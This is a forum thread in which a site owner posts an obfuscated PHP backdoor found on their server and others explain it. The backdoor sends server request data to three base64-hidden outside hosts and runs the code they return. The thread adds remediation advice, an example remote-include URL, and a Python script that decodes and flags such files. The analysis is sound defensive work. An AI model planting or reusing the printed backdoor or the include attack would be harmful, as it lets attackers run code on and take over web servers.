Decoding an attack


Suchy


I found this in a file (174584.php) on my server, in a folder that is set to 777; most likely it is some kind of attack. Can you guys help me decode it: what does this attack do and how does it work?


<?
// Silence all errors so nothing is shown to a visitor if a remote fetch fails.
error_reporting(0);
$s = "e";
// Harvest request metadata, falling back to register_globals-style variables.
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// Pack every value as dot-separated base64; the literal "e" marks the ninth field.
$str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".$s." . base64_encode($i) . "." . base64_encode($j);
// Try three remote sources in turn. The base64 literals decode to "http://" . "a.rsdcraft.ws",
// "http://" . "ad.runweb.info" and "http://7.xmldata.info/?". include() executes whatever PHP
// the remote host returns; the last fallback eval()s the raw response body.
if ((include(base64_decode("aHR0cDovLw==") . base64_decode("YS5yc2RjcmFmdC53cw==") . "/?" . $str)));
else if (include(base64_decode("aHR0cDovLw==") . base64_decode("YWQucnVud2ViLmluZm8=") . "/?" . $str));
else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=") . $str));
?>

include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8="


is attempting to include an external file. This is usually done by saving a PHP file on their own server with the extension .gif, so that it gets served out as-is, and including it from your server. All this 'base64_decode' is trying to hide the address of their server from you.


I have some experience of this... you need to change ALL your passwords, including those for any other users on your server. Even once you've done that, check all your scripts for security vulnerabilities, since people may have been snooping your source code and could take advantage of it. Make sure no files include $include where it is set by $include = $_GET['section'], since this can easily be attacked (yoursite.com?section=http://theirsite.com/dodgyinclude.gif); make sure register_globals is off, and keep a close eye on things for a while :)


I was caught by a keylogger in an internet cafe in Brasil (I guess, since the attacks I got afterward were in Portuguese).

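Decoding the posted script the way the reply above describes, as an added Python example that is not part of the thread and not a tool either poster mentions: it pulls every base64_decode("...") literal out of the one-liner, reconstructs the three remote URLs the script tries in turn, lists which $_SERVER fields it packs into the request, and shows how the dot-separated base64 query it sends can be read back from an egress proxy log. The copy of the one-liner, the benign comparison snippet and the request values are constructed here, and is_suspicious() is a heuristic of my own.

```python
import base64
import re

# Constructed copy of the one-liner from the first post (content verbatim, one line).
SAMPLE = r'''<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>'''

# Constructed benign snippet for comparison: base64 is used, but nothing is fetched or executed.
CLEAN = r'''<?php echo base64_decode("aGVsbG8="); ?>'''

B64_CALL = re.compile(r'base64_decode\("([A-Za-z0-9+/=]+)"\)')
# A loader whose argument *starts* with a chain of base64_decode() calls joined by '.'.
LOADER = re.compile(
    r'(include|include_once|require|require_once|file_get_contents)\('
    r'((?:base64_decode\("[A-Za-z0-9+/=]+"\)\.?)+)')
SERVER_KEY = re.compile(r'\$_SERVER\["([A-Z_]+)"\]')


def b64text(s):
    return base64.b64decode(s).decode("utf-8", "replace")


def decode_literals(src):
    """Every base64_decode("...") literal in source order, decoded to text."""
    return [b64text(m) for m in B64_CALL.findall(src)]


def remote_loaders(src):
    """(function, url_prefix) for each loader fed a base64-built string.
    Adjacent literals joined with '.' are concatenated just as PHP would."""
    found = []
    for m in LOADER.finditer(src):
        prefix = "".join(b64text(p) for p in B64_CALL.findall(m.group(2)))
        found.append((m.group(1), prefix))
    return found


def is_suspicious(src):
    """Heuristic (my own): a base64-hidden http(s):// target handed to a loader."""
    return any(url.startswith(("http://", "https://")) for _, url in remote_loaders(src))


def harvested_keys(src):
    """Which $_SERVER fields the script reads, in order of first use."""
    keys = []
    for k in SERVER_KEY.findall(src):
        if k not in keys:
            keys.append(k)
    return keys


# Field order mirrors $a..$j in the sample; the literal "e" sits after REMOTE_ADDR.
FIELDS_BEFORE_MARK = ["HTTP_HOST", "SERVER_NAME", "REQUEST_URI", "PHP_SELF",
                      "QUERY_STRING", "HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR"]
FIELDS_AFTER_MARK = ["SCRIPT_FILENAME", "HTTP_ACCEPT_LANGUAGE"]


def beacon_query(server):
    """Rebuild the query string the sample appends to each URL from a dict of
    server variables (missing ones become empty chunks, as unset PHP vars would)."""
    enc = lambda k: base64.b64encode(server.get(k, "").encode()).decode()
    return ".".join([enc(k) for k in FIELDS_BEFORE_MARK] + ["e"]
                    + [enc(k) for k in FIELDS_AFTER_MARK])


def decode_beacon(query):
    """Read such a query back (e.g. from a proxy log); base64 never contains '.'."""
    return [c if c == "e" else b64text(c) for c in query.split(".")]


if __name__ == "__main__":
    for fn, url in remote_loaders(SAMPLE):
        print(f"{fn}() fetches from {url}")
    print("fields sent:", ", ".join(harvested_keys(SAMPLE)))
    q = beacon_query({"HTTP_HOST": "victim.example", "REQUEST_URI": "/174584.php",
                      "REMOTE_ADDR": "203.0.113.5"})   # constructed request values
    print("example beacon query:", q)
    print("decoded back:", decode_beacon(q))
    print("benign snippet flagged?", is_suspicious(CLEAN))
```

Run it as a script to see the three decoded hosts; the same functions can be pointed at any file found in a world-writable directory to triage it quickly. What stops this class of script on the server side is the PHP configuration the reply hints at: with allow_url_include=Off, include() refuses remote URLs outright, and allow_url_fopen=Off does the same for file_get_contents(), so the fallback chain fails before any remote code runs.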

"Check your computer" means: run virus/malware scans to try to get rid of anything you don't want.


Advanced users don't usually think they know what an infected system looks like (zero-day exploits, etc.), but if you know what a clean system should look like, you can catch most garbage manually using HijackThis (ask Google).


Or, you could abandon winblows for a better platform ;) Debian, Ubuntu, and gNewSense all rock. All free of fee, but gNewSense is completely free as in speech. Have a look around. They're all also easy to dual-boot, so that you can dev on a *nix system and still have winblows there for your games.
